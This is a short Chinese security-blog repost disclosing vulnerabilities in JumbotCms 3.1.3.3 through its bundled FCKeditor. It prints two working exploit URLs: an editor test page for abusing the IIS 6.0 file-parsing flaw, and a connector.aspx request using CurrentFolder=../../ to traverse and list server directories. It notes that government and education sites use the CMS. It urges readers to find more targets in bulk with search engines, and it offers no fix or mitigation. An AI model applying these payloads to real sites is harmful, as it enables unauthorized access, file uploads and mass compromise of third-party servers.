将博 CMS Powered by JumbotCms 漏洞

admin 2021年4月3日20:01:25评论84 views字数 807阅读2分41秒阅读模式

由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录

百度了一下没有人发,就发一下吧 比较低级的漏洞 ,一些政府和教育机构用的比较多

主要是FCKeditor的漏洞 版本忘记看了。。。。

程序名称:将博CMS通用版 JumbotCms

程序版本:3.1.3.3

利用方式:

利用IIS6.0解析漏洞

http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm

遍历目录漏洞

http://www.xxx.com/cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

不要拍砖,看客全当笑话

没事了自己去谷歌批量吧

Powered by JumbotCms 版本:3.1.3.3

转自:http://www.90sec.org/viewthread.php?tid=1964&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章来源于lcx.cc:将博 CMS Powered by JumbotCms 漏洞

相关推荐: 浅谈CSRF攻击方式,Cross-site request forgery,跨站请求伪造详解

一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解C…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:01:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   将博 CMS Powered by JumbotCms 漏洞https://cn-sec.com/archives/324916.html

发表评论

匿名网友 填写信息